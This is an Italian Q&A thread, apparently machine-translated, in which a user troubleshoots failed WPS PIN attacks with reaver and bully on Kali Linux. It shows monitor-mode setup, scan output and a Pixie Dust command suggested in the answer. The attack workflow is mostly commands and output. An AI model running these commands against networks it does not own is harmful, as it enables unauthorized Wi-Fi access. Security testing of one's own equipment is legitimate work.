WPS cracking usando reaver-bully su Kali Linux

3

Il mio hardware si presenta così: Laptop Lenovo con RHEL e Virtual Machine Manager che lanciano una VM con Kali Linux. Ho provato queste schede di rete:

  • TL-WN722N
  • AWUS051NH
  • AWUS036NH

Sto avviando la VM in modalità live (non ho bisogno di archiviazione persistente) e condivido una di queste schede di rete alla volta. Con tutti questi ho gli stessi esatti risultati.

Per prima cosa eseguo queste due linee per avere accesso tramite ssh per un'esperienza terminale migliore eccetera.

$ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
$ service ssh start

Immergersi nella configurazione delle interfacce di rete:

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

  PID Name   
  963 NetworkManager
 1087 dhclient
 1534 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       rt2800usb   Ralink Technology, Corp. RT3572

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) 
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig  eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
lo        no wireless extensions.

root@kali:~# ifconfig wlan0mon down 
root@kali:~# iwconfig wlan0mon mode monitor 
root@kali:~# ifconfig wlan0mon up   
root@kali:~# iwconfig eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
 lo        no wireless extensions.

E dopo una scoperta:

 root@kali:~# airodump-ng wlan0mon

    BSSID    PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX  -80        2        0    0   1  54e  WPA2 CCMP   MGT  NumA
 XX:XX:XX:XX  -28        2        0    0   6  54e  WPA2 CCMP   PSK  NumB 
 XX:XX:XX:XX  -81        2        0    0   11  54e  WPA2 CCMP   MGT  NumC


root@kali:~# wash -i wlan0mon    

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...


root@kali:~# wash -i wlan0mon -C

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX       1            -73        1.0               No                WiA
XX:XX       6            -27        1.0               No                WiB
XX:XX       11            -77        1.0               No                WiC

E ora la parte di attacco:

root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv       

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from XX:XX:XX:XX
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 11
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)

E anche usando il bullo:

root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan0mon' to channel '11'
[!] Using 'XX:XX:XX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:XX:XX' on channel '11'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'TargetA' (XX:XX:XX)
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'

So che almeno 2 dei miei punti di accesso ai parchi giochi sono vulnerabili all'attacco in base agli indirizzi mac (polvere di follia che penso chiamata). Sono riuscito a craccarli usando un telefono Android Android senza nome. E questo attacco non funziona con nessuna combinazione delle mie schede di rete / nessuno dei punti di accesso di destinazione.

Ci deve essere una configurazione che mi manca o una compatibilità hardware che mi manca.

So che queste schede di rete sono pensate per la modalità di monitoraggio, suppongo che dovrebbero supportare anche wps, ma non sono ancora riuscito a farlo funzionare. Ho bisogno di uno specifico per poter fare gli attacchi WPS?

    
posta Dimitris Sapikas 17.09.2017 - 00:35
fonte

1 risposta

5

Ho un paio di consigli per te.

Prima di tutto. Se non sbaglio, entrambe le tue Alfa sono basate su chipset Ralink. Devi sapere che i chipset e il rover del Ralink hanno risultati orribili. È molto meglio usare il bullo.

Un'altra cosa importante potrebbe essere sul reaver per usare l'argomento -N (--no-nacks). Prova a usarlo. Usando questo parametro, non invierà messaggi NACK quando vengono ricevuti pacchetti fuori ordine. Forse può aiutarti ma come ho detto sul mio primo punto ... usando Ralink + reaver = crap.

L'attacco Pixie Dust può essere integrato direttamente su Reaver e Bully se hai una certa versione o superiore (1.1 per Bully e 1.5.2 per Reaver). Quindi, dai tuoi registri, sembra che tu possa farlo usando Reaver ... ma hai ancora il problema (Ralink blah blah blah ...). Quindi il mio suggerimento è, aggiornare la versione bullo. Su Kali puoi ottenere la versione 1.1 direttamente dai repository. E poi puoi eseguirlo direttamente usando questo comando:

bully wlan0mon -b XX:XX:XX:XX:XX:XX -c 11 -d -v 3

Nota1 ovviamente è necessario aver installato anche pixiewps. Puoi farlo facilmente tramite apt su Kali, è su repository.

Nota2 sul bullo 1.1 puoi aumentare il livello di verbosità da 3 a 4. Questo non funziona sulle versioni precedenti.

Se sei abbastanza sicuro che alcuni AP sono vulnerabili agli attacchi WPS, puoi testarlo direttamente usando l'opzione -p xxxxxxxx . Immagino tu sia il proprietario degli AP, vero? e ovviamente conosci la spilla. Puoi provare a usare questa opzione per testare se sei in grado di ottenere la password. È utile sapere quale combinazione di software e chipset funziona correttamente.

Un ultimo consiglio, prova alcuni script wireless. Uno su cui sto collaborando airgeddon .

Spero che ti aiuti!

    
risposta data 17.09.2017 - 23:53
fonte

Leggi altre domande sui tag